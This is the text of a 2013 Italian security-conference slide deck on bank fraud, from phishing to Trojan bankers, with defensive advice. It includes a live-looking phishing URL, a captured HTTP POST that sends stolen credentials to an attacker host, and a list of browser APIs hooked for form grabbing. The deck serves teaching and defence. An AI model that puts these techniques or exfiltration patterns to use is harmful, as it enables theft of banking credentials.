R. Villano - Sicurezza e reati informatici: problemi tecnici, giuridici e no...Raimondo Villano
 
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...Ugo Lopez
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Matteo Makovec
 
La gestione delle identità per il controllo delle frodi bancarie
La gestione delle identità per il controllo delle frodi bancarieLa gestione delle identità per il controllo delle frodi bancarie
La gestione delle identità per il controllo delle frodi bancarieGiuseppe Paterno'
 
Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...
Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...
Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...Data Driven Innovation
 
Workshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaWorkshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaNextre Engineering
 
Crittografia firma digitale
Crittografia firma digitaleCrittografia firma digitale
Crittografia firma digitalejamboo
 
Rapine e truffe ai bancomat, come difendersi?
Rapine e truffe ai bancomat, come difendersi? Rapine e truffe ai bancomat, come difendersi?
Rapine e truffe ai bancomat, come difendersi? arinadrucioc
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfHelpRansomware
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malwareGianni Amato
 
Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)Massimo Farina
 
I crimini informatici e l'azienda
I crimini informatici e l'aziendaI crimini informatici e l'azienda
I crimini informatici e l'aziendaGiovanni Fiorino
 
Attacchi informatici: cosa sono e come funzionano
Attacchi informatici: cosa sono e come funzionanoAttacchi informatici: cosa sono e come funzionano
Attacchi informatici: cosa sono e come funzionanoSiteGround.com
 
Seminario di informatica 2
Seminario di informatica 2Seminario di informatica 2
Seminario di informatica 2Andrea Barilli
 
Stop Spam in google analytics report
Stop Spam in google analytics reportStop Spam in google analytics report
Stop Spam in google analytics reportE2 Ict Snc
 

Semelhante a Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende (20)

Sicurezza informatica
Sicurezza informaticaSicurezza informatica
Sicurezza informatica
 
Crittografia Firma Digitale
Crittografia Firma DigitaleCrittografia Firma Digitale
Crittografia Firma Digitale
 
635918284550670475 ransomware in ospedale
635918284550670475 ransomware in ospedale635918284550670475 ransomware in ospedale
635918284550670475 ransomware in ospedale
 
R. Villano - Sicurezza e reati informatici: problemi tecnici, giuridici e no...
R. Villano - Sicurezza e reati informatici:  problemi tecnici, giuridici e no...R. Villano - Sicurezza e reati informatici:  problemi tecnici, giuridici e no...
R. Villano - Sicurezza e reati informatici: problemi tecnici, giuridici e no...
 
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
C3i - La cyber security nel contesto nazionale - Scenari e strumenti di prote...
 
Sicurezza in Rete
Sicurezza in ReteSicurezza in Rete
Sicurezza in Rete
 
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
Extended summary of "Opening the Blackbox of VirusTotal: Analyzing Online Phi...
 
La gestione delle identità per il controllo delle frodi bancarie
La gestione delle identità per il controllo delle frodi bancarieLa gestione delle identità per il controllo delle frodi bancarie
La gestione delle identità per il controllo delle frodi bancarie
 
Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...
Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...
Il fattore tecnico ed umano nel calcolo del rischio informatico (Antonio Capo...
 
Workshop sulla Sicurezza Informatica
Workshop sulla Sicurezza InformaticaWorkshop sulla Sicurezza Informatica
Workshop sulla Sicurezza Informatica
 
Crittografia firma digitale
Crittografia firma digitaleCrittografia firma digitale
Crittografia firma digitale
 
Attacchi Informatici
Attacchi InformaticiAttacchi Informatici
Attacchi Informatici
 
Rapine e truffe ai bancomat, come difendersi?
Rapine e truffe ai bancomat, come difendersi? Rapine e truffe ai bancomat, come difendersi?
Rapine e truffe ai bancomat, come difendersi?
 
Come recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdfCome recuperare file crittografati da diversi dispositivi [2022].pdf
Come recuperare file crittografati da diversi dispositivi [2022].pdf
 
Botnet e nuove forme di malware
Botnet e nuove forme di malwareBotnet e nuove forme di malware
Botnet e nuove forme di malware
 
Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)Cybercrime: investigazione forense e mitigazione (p.1)
Cybercrime: investigazione forense e mitigazione (p.1)
 
I crimini informatici e l'azienda
I crimini informatici e l'aziendaI crimini informatici e l'azienda
I crimini informatici e l'azienda
 
Attacchi informatici: cosa sono e come funzionano
Attacchi informatici: cosa sono e come funzionanoAttacchi informatici: cosa sono e come funzionano
Attacchi informatici: cosa sono e come funzionano
 
Seminario di informatica 2
Seminario di informatica 2Seminario di informatica 2
Seminario di informatica 2
 
Stop Spam in google analytics report
Stop Spam in google analytics reportStop Spam in google analytics report
Stop Spam in google analytics report
 

Mais de Gianfranco Tonello

Bootkits are not dead, Pitou is back!
Bootkits are not dead, Pitou is back!Bootkits are not dead, Pitou is back!
Bootkits are not dead, Pitou is back!Gianfranco Tonello
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Gianfranco Tonello
 
Petya Ransomware: sotto i riflettori
Petya Ransomware: sotto i riflettoriPetya Ransomware: sotto i riflettori
Petya Ransomware: sotto i riflettoriGianfranco Tonello
 
Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Gianfranco Tonello
 
Checkmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareCheckmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareGianfranco Tonello
 
Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...
Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...
Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...Gianfranco Tonello
 

Mais de Gianfranco Tonello (6)

Bootkits are not dead, Pitou is back!
Bootkits are not dead, Pitou is back!Bootkits are not dead, Pitou is back!
Bootkits are not dead, Pitou is back!
 
Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)Scacco matto ai crytpo malware (milano)
Scacco matto ai crytpo malware (milano)
 
Petya Ransomware: sotto i riflettori
Petya Ransomware: sotto i riflettoriPetya Ransomware: sotto i riflettori
Petya Ransomware: sotto i riflettori
 
Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)Scacco matto ai crytpo malware (smau 2016 - bologna)
Scacco matto ai crytpo malware (smau 2016 - bologna)
 
Checkmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malwareCheckmate to crypto malware. Scacco matto ai crypto malware
Checkmate to crypto malware. Scacco matto ai crypto malware
 
Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...
Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...
Evoluzione dei malware in ambiente Android: dalle metodologie di infezione al...
 

Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende

  • 1. Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende mercoledì 23 ottobre alle ore 13:00 sala Arena Trade - Pad. 1 Relatori: ing. Gianfranco Tonello, Roberto Spagliccia Milano, 23/10/2013
  • 2. Frode informatica 25 Maggio 2012: fonte «Il Mattino di Padova» http://mattinopadova.gelocal.it/cronaca/2012/05/25/news/frode-informatica-ripulito-il-conto-degli-avvocati-di-padova-1.5154231 Phishing Trojan Banker A xe sta ea segretaria! Ogni riferimento a persone o fatti è puramente casuale «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 2
  • 3. Frodi bancarie: tecniche utilizzate • Phishing: si intende una tecnica attraverso la quale un soggetto malintenzionato (chiamato phisher), riesce a raccogliere dati personali di accesso, tramite tecniche di ingegneria sociale che negli anni si sono fatte sempre più raffinate. • Trojan Banker: malware in grado di rubare le credenziali di accesso alla propria banca, modificando le schermate di login dei più diffusi siti di home banking. 3 Scopo: rubare denaro dal conto corrente eseguendo bonifici su conti esteri. «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 4. Frodi bancarie: Phishing La tecnica è quella di inviare email relative al proprio conto corrente, nelle quali si invita il destinatario ad accedere immediatamente al proprio conto, per verificare i propri dati oppure per convalidare vincite o premi che l’istituto ha deciso di erogare. «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 4
  • 5. Phishing con link fraudolento 1/2 Link: http://gfsrtdrhqptyszmvs.siamsensationsthai.com/my/gfsrtdrhqptyszmvs.asp?e=<email> 5 http://siamsensationsthai.com «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 6. Phishing con link fraudolento 2/2 «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 6
  • 7. Phishing con allegato 1/3 7 Allegato Document-poste-it.html «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 8. Phishing con allegato 2/3 8 Sorgente della pagina: Document-poste-it.html Nome utente Pluto Paperino Password paperopoli Cod. fiscale pltppr73b08g224y Num. carta 4012 0526 7849 4512 «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 9. Phishing con allegato 3/3 Analisi traffico di rete [TCP Porta: 80 SEND src 192.168.1.39 -> dst 85.214.122.107 Len=711 Seq=0x37461cb3 Ack=0xa5b319fc ACK Flags=0x18] POST /ac.php HTTP/1.1 Host: zimmerers.de User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0 [..] Content-Type: application/x-www-form-urlencoded Content-Length: 165 utente=Pluto+Paperino&password=paperopoli&codice=pltppr73b08g224y&card1=4012&card2=0526&card3=7849& card4=4512&mese=10&anno=2015&cvv2=941&btn_login.x=36&btn_login.y=8 [TCP Porta: 80 RECEIVE src 85.214.122.107 -> dst 192.168.1.39 Len=203 Seq=0xa5b319fc Ack=0x37461f7a ACK Flags=0x18] HTTP/1.1 302 Found Date: Mon, 07 Oct 2013 13:31:29 GMT Server: Apache Location: http://poste.it [..] [TCP Porta: 80 SEND src 192.168.1.39 -> dst 62.241.4.35 Len=414 Seq=0x3a538eb3 Ack=0xae867f70 ACK Flags=0x18] GET / HTTP/1.1 Host: poste.it User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0 [..] 9 «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 10. Phishing: statistiche gennaio – marzo 2013 10 • I siti di phishing sono diminuiti del 20% dal 4° trim. 2012 al 1° trim. 2013 • Le segnalazioni di phishing sono diminuite del 31% da gennaio a marzo 2013 Siti di Phishing - Marzo 2013 Stati Uniti 53,18% Francia 2,38% Germania 7,40% Russia 2,34% UK 4,21% Brasile 2,33% Canada 4,15% Lituania 1,29% Turchia 3,81% Olanda 1,26% Fonte: Phishing Activity Trends Report 1st Quarter 2013 www.apwg.org «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 11. Autenticazione nell’home banking • Aut. a senso unico: Username e password statiche con tastiera fisica/virtuale • Autenticazione a due fattori: Gridcard e TAN (Transaction Access Number) • Autenticazione a due fattori: One Time password (OTP) • Autenticazione a due fattori: OTP via SMS • Autenticazione a due fattori: OTP via lettore di Smart Card (smart tan) «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 11
  • 12. Aut. a senso unico: tastiera fisica Descrizione La password è una parola segreta o una stringa di caratteri usata per l’autenticazione. Con statica intendiamo una password costante, che non cambierà nel tempo, a meno che non venga aggiornata. La password viene inserita nel campo «textbox» dell’HTML attraverso la tastiera hardware o virtuale. Come viene sconfitta I trojan banker possono memorizzare la password attraverso 2 tecniche: keylogging e form grabbing. Un keylogger può memorizzare ogni tasto premuto dall’utente, ma non è in grado di catturare la clipboard. L’utente può memorizzare le sue credenziali in un file e fare un «copia e incolla» per semplicità o per motivi di sicurezza. La tecnica del form grabbing consiste nell’intercettare le richieste API nel browser e memorizzare i dati del web form prima che siano passate ad internet. Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 12
  • 13. Aut. a senso unico: tastiera virtuale Descrizione La tastiera virtuale è stata introdotta in risposta al keylogging e form grabbing. Consiste nel creare una tastiera virtuale sullo schermo con una disposizione casuale dei tasti. Come viene sconfitta I trojan banker possono memorizzare l’area dell’immagine del tasto premuto oppure registrare un video della sequenza dei tasti premuti. Questo tipo attacco memorizza le informazioni in remoto per essere interpretate successivamente. Valutazione dei rischi È vulnerabile alla maggior parte dei Trojan Banker con funzionalità screen shot capturing. Non fornisce miglioramenti in termini di sicurezza rispetto alla textbox. «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 13
  • 14. Autenticazione a due fattori: Gridcard e TAN (Transaction Access Number) Descrizione La grid card è una tabella o griglia che contiene di solito 50 codici alfanumerici. Il sistema della grid card può richiedere lo stesso codice più volte. La TAN (Transaction Access Number) è similare alla grid card, contiene una lista di codici. Come viene sconfitta I trojan banker possono catturare un codice della grid card o TAN, e di eseguire una disposizione bancaria reiterata fino a che non viene richiesto il codice catturato. Valutazione dei rischi È vulnerabile a Trojan Banker. Questa soluzione non migliora la sicurezza contro keylogger o form grabber. Inserire il codice C2 F4 H5 K V M «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 14
  • 15. Autenticazione a due fattori: One Time password (OTP) Descrizione L’OTP (one time password) è una password che è valida solo per una sessione o disposizione. Gli OTP sono basati su algoritmi crittografici One-way e utilizzano chiavi differenti per ogni utente. Ogni OTP utilizzato viene cancellato o messo in una blacklist per non essere utilizzato una seconda volta. Le OTP sono valide solo per un breve periodo di tempo. Come viene sconfitta I trojan banker possono catturare l’OTP e bloccare l’inoltro alla banca, segnalando all’utente un’errata autenticazione all’home banking. Nel tempo di vita dell’OTP, il trojan banker ha tutte le informazioni necessarie per eseguire una disposizione. Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati». Questa soluzione è vulnerabile all’HTML injection e ad altre tecniche. «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 15
  • 16. Autenticazione a due fattori: OTP via SMS Descrizione L’OTP (one time password) viene inviata attraverso un SMS. L’OTP è associato alla disposizione da eseguire. Come viene sconfitta La componente mobile del trojan banker può leggere l’SMS ricevuto e inoltrare il token OTP contenuto ad un server remoto. In questo modo il trojan banker ha tutte le informazioni necessarie per completare l’esecuzione della disposizione. Valutazione dei rischi È vulnerabile a Trojan Banker «sofisticati» che utilizzano componenti mobile. Questa soluzione è vulnerabile nell’intercettazione dell’SMS. Esempio di SMS: Fineco – SMS gratuito. Bonifico 10,59 EUR a CC 00001023456 Pluto Paperino. Conferma con SMS PIN 217489 o inoltra questo SMS al ******* «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 16
  • 17. Autenticazione a due fattori: OTP via lettore di Smart Card (smart tan) Descrizione Quando viene eseguita una disposizione, il sito della banca mostrerà un codice relativo a quella transazione. Il codice indicato a video dovrà essere inserito nel lettore di smart card, inserendo prima la carta di credito e il suo relativo PIN, e poi digitando il codice indicato dalla banca. In risposta, il lettore restituirà un OTP necessario per concludere l’operazione dispositiva sul sito. Come viene sconfitta Il Trojan Banker modifica in modo silente la destinazione della disposizione autorizzata, grazie ad un attacco man-in-the-middle, senza che l’utente se ne accorga. Valutazione dei rischi Molto sicuro, ma è vulnerabile a Trojan Banker che modificano la destinazione della transazione. «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 17
  • 18. Tecniche dei Trojan Banker 1/2 Trojan Banker Rubare le credenziali bancarie Modificare la destinazione della disposizione Disposizione eseguita sul conto del truffatore «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 18
  • 19. Tecniche dei Trojan Banker 2/2 • Keylogging • Screen shot capturing • Browser protected storage • Redirect verso falsi siti bancari • VNC privata / Socks Proxy con Back Connect • Form grabbing (MITB) • SMS grabbing • Manipolazione automatica (passiva e attiva) • Android Banking App repacking «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 19
  • 20. Form grabbing (MITB) Tutti i browser sono vulnerabili: IE, Firefox, Google Chrome, Opera, etc. Hooked API generiche GetWindowText, TranslateMessage (user32.dll) send, WSASend (ws2_32.dll) Internet Explorer HttpSendRequest (wininet.dll) HttpSendRequestEx (wininet.dll) InternetReadFile (wininet.dll) InternetReadFileEx (wininet.dll) InternetQueryDataAvailable (wininet.dll) InternetCloseHandle (wininet.dll) EncryptMessage (secure32.dll) 1 2 4 3 Firefox PR_Connect (nspr4.dll) PR_Write (nspr4.dll) PR_Read (nspr4.dll) PR_Close (nspr4.dll) Nspr4.dll Malware dll injection «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 20
  • 21. Frodi bancarie: Trojan Banker • Zeus (ZBot – Citadel – ICE IX): file eseguibile che infetta il pc, metodo di diffusione siti infetti o installato da altri malware • Sinowal: rootkit che infetta il Master Boot Record, metodo di diffusione siti infetti o installato da altri malware • Trojan.Win32.Banker: file eseguibile che infetta il computer, metodo di diffusione via email • Carberp / SpyEye / Gataka / IBANK : file eseguibile che infetta il pc, metodo di diffusione siti infetti o installato da altri malware «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 21
  • 22. Zeus: Il primo trojan banker Anno 2007 Nome file ntos.exe, oembios.exe, twext.exe, sdra64.exe Caratteristiche Web fake; Keylogger; Screen shot capture; Browser protected Storage; Form grabber: IE/Firefox; Web inject per Internet explorer; Socks proxy con back connection; VNC; Rubare certificati X.509 Plugin venduti separatamente Target Banche US, UK, IT, etc «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 22
  • 23. Zeus: banche italiane sotto il mirino Elenco di alcuni siti di banche italiane trovato all’interno del file di configurazione di Zeus https://www.gruppocarige.it/grps/vbank/jsp/login.jsp https://bancopostaonline.poste.it/bpol/bancoposta/formslogin.asp https://privati.internetbanking.bancaintesa.it/sm/login/IN/box_logi n.jspe https://hb.quiubi.it/newSSO/x11logon.htm https://www.iwbank.it/private/index_pub.jhtml* https://web.secservizi.it/siteminderagent/forms/login.fcc https://www.isideonline.it/relaxbanking/sso.Login «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 23
  • 24. Trojan Banker: esempi di web inject 1/2 24 Il trojan Banker modifica (lato client) la pagina di login della banca, richiedendo anche la password dispositiva. Gli autori del malware possono accedere al conto online della vittima e eseguire bonifici su conti esteri alla sua insaputa. «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 25. Trojan Banker: esempi di web inject 2/2 25 Altro esempio di Web Injection dove viene richiesta anche la password dispositiva. «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 26. Sinowal: plugin per Google Chrome Anno 2008 Tipologia Infetta il Master Boot Record, installa plugin o moduli per rubare le credenziali bancarie Plugin: Content.js; Plugin.dll; msseedir.dll; msdr.dll; lmbd.dll; wsse.dll; mmdd.dll; iexpgent64.dll (Nov. 2012 – ott. 2013) Caratteristiche Google Chrome plugin; Form Post tracking Target Banche NL «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 26
  • 27. Sinowal: plugin per Google Chrome Wvgimhukax.crx Manifest.json Background.html Content.js Plugin.dll Wvgimhukax.crx Content.js Plugin.dll Tracciatura web form «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 27
  • 28. Sinowal: default plugin -> content.js Il «default plugin» utilizzato da Sinowal è costituito da 2 moduli: • Content.js • Plugin.dll Il modulo javascript modifica il metodo POST per tutti i form caricati nella pagina web. In questo modo è in grado di leggere la password inserita nel form. Content.js «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 28
  • 29. Frodi bancarie: Carberp e OTP VIRUS 1 2 3 4 1. L’utente invia le sue credenziali di accesso alla banca: login, password, Pass-key Internet banking (OTP = One Time Password). 2. Le credenziale vengono intercettate dal virus, che non le inoltra alla banca, ma le memorizza. Il virus visualizza un falso messaggio di inserimento errato di login/password 3. L’utente re-inserisce login/password e un nuovo valore della Pass-key Internet banking. 4. La Banca conferma la correttezza dei dati inseriti e l’utente accede al suo conto online «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 29
  • 30. SpyEye: concorrente di Zeus Anno 2010 Nome file Cleansweep.exe Caratteristiche Web fake; Keylogger; Screen shot capture; Form grabber: POST / GET; Web inject; Socks proxy con back connection; Rubare certificati X.509 Plugin venduti separatamente Terminare «Zeus» Target Bank of America, banche UK, US, etc «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 30
  • 31. ZITMO: Zeus In The MObile Zitmo: • Symbian • Android • Blackberry Spyeye-In- The-MObile: • Symbian Bonifico eseguito sul conto del truffatore 10 SMS Bank: PIN: nnnn 4 Login: Password: Num. di cellulare: Modello: Zeus botnet 5 SMS: Scarica la seguente app o certificato di sicurezza: link 1 2 3 6 7 12 8 9 11 «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 31
  • 32. Android Banking App: repacking Sviluppatore compilazione packing Firmato con APK Malicious attacker decompilazione Analisi codice Modifica del codice chiave privata Google market o di terze parti ricompilazione repacking Firmato con chiave privata APK Bonifico eseguito sul conto del truffatore 1 2 3 4 5 6 «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 32
  • 33. Android Fineco App: esempio di repacking com.fineco.it-1comfinecoitdatamodeladx.smali «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 33
  • 34. Android Fineco App: esempio di repacking SMS: Func=json/G_L OGINuserID= 123password =abc «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 34
  • 35. Maggiori cause di infezione • Navigazione su siti non raccomandabili • Navigazione su siti attendibili ma che sono stati compromessi (infettati) • Email con allegati infetti o link su siti infetti «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 35
  • 36. Navigazione su siti non sicuri • Molti siti poco attendibili includono nelle loro pagine script (principalmente JavaScript o Flash) che sono in grado di scaricare ed eseguire codice sul computer di chi lo sta visitando. Questo può essere tanto più dannoso quanto più alto è il livello di privilegi con il quale è eseguito il browser (ad esempio Administrator). • Exploit kit: Black Hole, Cool Exploit (sfruttano vulnerabilità) • Molto spesso questo tipo di siti include pubblicità fraudolente, ingannevoli o banner pubblicitari che, se cliccati, portano ad altri siti infetti o al download di software dannoso «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 36
  • 37. Black Hole: Vulnerabilità utilizzate 37 Vulnerabilità Descrizione CVE-2013-0422 Java CVE-2012-4681 Java CVE-2012-1889 Windows CVE-2012-1723 Java CVE-2012-0507 Java CVE-2011-3544 Java CVE-2011-2110 Adobe Flash Player CVE-2011-0611 Adobe Flash Player CVE-2010-3552 Java CVE-2010-1885 Windows Vulnerabilità Descrizione CVE-2010-1423 Java CVE-2010-0886 Java CVE-2010-0842 Java CVE-2010-0840 Java CVE-2010-0188 Adobe Reader CVE-2009-1671 Java CVE-2009-0927 Adobe Reader CVE-2008-2992 Adobe Reader CVE-2007-5659 Adobe Reader CVE-2006-0003 Internet Explorer «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende»
  • 38. Virus dell’email «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 38
  • 39. Come mi difendo dai Malware • Antivirus sempre aggiornato e installato su tutti i pc della rete • Aggiornare: Windows, Java, Adobe Reader, Adobe Flash Player • Avere buonsenso nell’uso del computer: • Verificare la tipologia degli allegati che si salvano, una fattura non sarà di tipo Applicazione • Verificare la destinazione dei link su cui si clicca «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 39
  • 40. Conclusioni • Banche e istituti di credito non richiedono mai la password via email • Banche e istituti di credito non regalano premi in denaro, normalmente li chiedono! • Phishing in calo, ma attenzione! • Autenticazioni bancarie vulnerabili • Trojan Banker sofisticati e evoluti «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 40
  • 41. Domande «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 41
  • 42. Autori • Ing. Gianfranco Tonello (g.tonello@viritpro.com) • Roberto Spagliccia (r.spagliccia@viritpro.com) Grazie per l’attenzione «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 42
  • 43. Referenze • http://www.tgosft.it • Phishing: un'attività che non passa mai di moda: http://www.tgsoft.it/italy/news_archivio.asp?id=408 • Phishing Activity Trends Report 1st Quarter 2013: http://www.apwg.org • Home banking a rischio! Trojan.Win32.Banker.CS: la nuova frontiera del phishing: http://www.tgsoft.it/italy/news_archivio.asp?id=454 • http://www.tomsguide.com/us/factor-authentication-in-online-banking,review-678-5.html • http://en.wikipedia.org/wiki/Transaction_authentication_number • https://www.owasp.org/images/e/e4/AppsecEU09_The_Bank_in_The_Browser_Presentation_v1.1.pdf • ZeuS Banking Trojan Report: http://www.secureworks.com/cyber-threat-intelligence/threats/zeus/ • SpyEye Malware Infection Framework – Virus Bulletin July 2011 (www.virusbtn.com) • Mobile Banking Vulnerability: Android Repacking Threat – Virus Bulletin May 2012 (www.virusbtn.com) «Stato dell’arte delle truffe bancarie dal phishing ai Trojan.Banker, come si diffonde e come ci si difende» 43